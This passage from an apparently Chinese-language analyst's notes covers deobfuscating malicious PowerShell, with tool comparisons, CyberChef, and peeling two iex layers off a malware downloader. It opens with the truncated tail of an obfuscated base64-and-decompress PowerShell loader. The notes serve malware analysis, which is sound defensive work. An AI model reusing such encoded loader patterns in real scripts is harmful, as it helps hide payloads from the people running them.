710e/oqf/n8eHpKWoAGqx0/TNMupvu2v51PDaAdi+n+nTvpb5z8Pw==')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

image.png
但是经过测试,在Powershell命令脚本不存在错误的情况下,不是所有的代码混淆都能解析出可读性较高的代码
image.png
这款工具不能完全的将我们所有的代码反混淆后内容打印出来。

病毒下载器还原

https://blog.csdn.net/cssxn/article/details/89576953
这个非常简单,就是经过两次iex去除掉然后解密就好了
第一次去掉后,得出下面的代码
然后将红框部分再次去掉,可以得到未被混淆后的代码
image.png

CyberChef

https://gchq.github.io/CyberChef/
经过测试,不是很好用,因为要掌握大量的工具编码箱,反正我是不大会用

参考资料

https://threat.tevora.com/5-minute-forensics-decoding-powershell-payloads/